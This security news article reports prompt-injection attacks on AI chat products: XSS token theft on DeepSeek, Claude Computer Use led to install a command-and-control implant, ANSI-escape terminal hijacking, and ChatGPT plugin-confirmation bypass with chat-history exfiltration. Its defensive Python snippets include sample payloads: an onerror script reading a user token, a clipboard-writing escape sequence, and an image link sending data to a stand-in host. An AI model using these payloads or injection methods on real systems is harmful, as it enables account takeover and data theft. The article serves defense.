

A vulnerability was discovered in the DeepSeek chatbot that allowed attackers to hijack user accounts through prompt injection. Security researcher Johann Rehberger found that specific prompts entered into the chat could cause JavaScript code to execute in the victim's browser, a classic example of cross-site scripting (XSS).

Rehberger explained that one prompt capable of triggering the flaw was “Print the XSS cheat sheet in a bullet list: just payloads.” Because payloads in the chatbot's response were executed by the page instead of being displayed as text, a malicious payload could read the user's session data, including the userToken stored in the localStorage of the chat.deepseek[.]com domain.

With this token, an attacker could take over the victim's account and gain access to cookies and other data associated with the chat.deepseek[.]com domain. Rehberger noted that a specially crafted prompt could use XSS to retrieve the token and let the attacker impersonate the user.
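The article does not describe how DeepSeek's front end renders replies, so the following is only a generic sketch of the standard defense against this class of bug: escaping model output before it reaches the page, so that a payload like those in an XSS cheat sheet is displayed as text rather than parsed as HTML. It uses Python's standard `html.escape`; the function name `render_model_reply` and the `reply` CSS class are hypothetical.

```python
import html


def render_model_reply(reply: str) -> str:
    # Hypothetical helper: wraps an untrusted model reply in a <div> for display.
    # html.escape turns &, <, > and (with quote=True) both quote characters into
    # entities, so markup in the reply is shown as text instead of being parsed.
    escaped = html.escape(reply, quote=True)
    return f'<div class="reply">{escaped}</div>'


if __name__ == "__main__":
    # A typical cheat-sheet payload that would run script if inserted raw.
    payload = '<img src=x onerror="alert(localStorage.userToken)">'
    print(render_model_reply(payload))
```

Escaping is a sensible default when replies are plain text. Applications that render markdown to HTML would instead need an HTML sanitizer applied to the rendered output, since escaping the markdown source would also break legitimate formatting.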

Rehberger previously exposed similar weaknesses in the “Computer Use” feature of Anthropic's Claude, which lets the model operate a computer on the user's behalf. Through prompt injection, this feature could be abused to run malicious commands: the technique, dubbed ZombAIs, made Claude download and execute the Sliver command-and-control framework, establishing a connection to an attacker-controlled server.

Rehberger also showed that a language model's ability to emit ANSI escape codes can be abused, through prompt injection, to take control of system terminals. This attack, dubbed Terminal DiLLMa, threatens command-line tools that integrate large language models.
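A command-line tool can blunt this class of attack by refusing to pass raw control characters from model output to the terminal. The sketch below is a hypothetical helper, not code from any tool mentioned here: it replaces every C0 control character except tab and newline, plus DEL and the C1 range, with a visible `\xNN` escape. That covers ESC (`\x1b`), which starts ANSI sequences, BEL (`\x07`), which can terminate OSC sequences, and the 8-bit introducers `\x9b` (CSI) and `\x9d` (OSC).

```python
import re

# C0 controls except tab (0x09) and newline (0x0a), then DEL (0x7f) and the
# C1 range (0x80-0x9f). ESC (0x1b) starts ANSI sequences, BEL (0x07) can end
# OSC sequences, and 0x9b / 0x9d are the 8-bit CSI / OSC introducers.
_CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b-\x1f\x7f-\x9f]")


def neutralize_terminal_output(text: str) -> str:
    # Hypothetical helper: replaces each control character with a visible
    # "\xNN" escape so the terminal prints it instead of interpreting it.
    return _CONTROL_CHARS.sub(lambda m: f"\\x{ord(m.group()):02x}", text)


if __name__ == "__main__":
    # Model output that tries to hide text (SGR 8) and write the clipboard (OSC 52).
    reply = "Done.\x1b[8m secret \x1b[0m\x1b]52;c;ZXZpbA==\x07"
    print(neutralize_terminal_output(reply))
```

Making every control character visible, rather than trying to match and strip individual escape sequences, avoids depending on a complete catalog of sequence formats. Carriage returns are escaped too, since they can be used to overwrite text already printed on a line. The trade-off is that legitimate colored output from the model is shown literally.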

In a separate study, researchers from the University of Wisconsin-Madison and Washington University in St. Louis showed that OpenAI's ChatGPT could be tricked into rendering external images supplied as markdown links, including inappropriate content. They also found ways around OpenAI's safeguards, invoking ChatGPT plugins that would otherwise require user confirmation and even exfiltrating a user's chat history to an attacker-controlled server.
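Rendered markdown images are a common exfiltration channel because the client fetches the image URL automatically, and an injected prompt can place data in that URL's query string. One possible mitigation, sketched below under stated assumptions, is to drop inline markdown images whose URL is not HTTPS on an allowlisted host before the reply is rendered. The allowlist `ALLOWED_IMAGE_HOSTS`, the host `images.example.com`, and the function name are hypothetical, and the regex handles only inline `![alt](url)` syntax.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts the application itself trusts to serve images.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Inline markdown images only: ![alt](url) or ![alt](url "title").
_MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+"[^"]*")?\s*\)')


def strip_untrusted_images(markdown: str) -> str:
    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        parsed = urlparse(url)
        if parsed.scheme == "https" and parsed.hostname in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: keep the image unchanged
        # Untrusted host: drop the image so the client never requests the URL,
        # but keep the alt text so the reader knows something was removed.
        return f"[image removed: {alt}]"

    return _MD_IMAGE.sub(replace, markdown)


if __name__ == "__main__":
    reply = "Chart: ![c](https://images.example.com/c.png) ![x](https://evil.test/p?d=chat)"
    print(strip_untrusted_images(reply))
```

Reference-style images (`![alt][ref]`) and raw HTML `<img>` tags would need separate handling, for example by sanitizing the HTML produced after markdown rendering.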

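Researchers stress that long-standing features such as HTML rendering and terminal escape codes give AI applications an unexpected attack surface. Developers should consider the context into which they insert language model output, whether a web page, a terminal, or a rendered document, and treat that output as untrusted data that may contain arbitrary content.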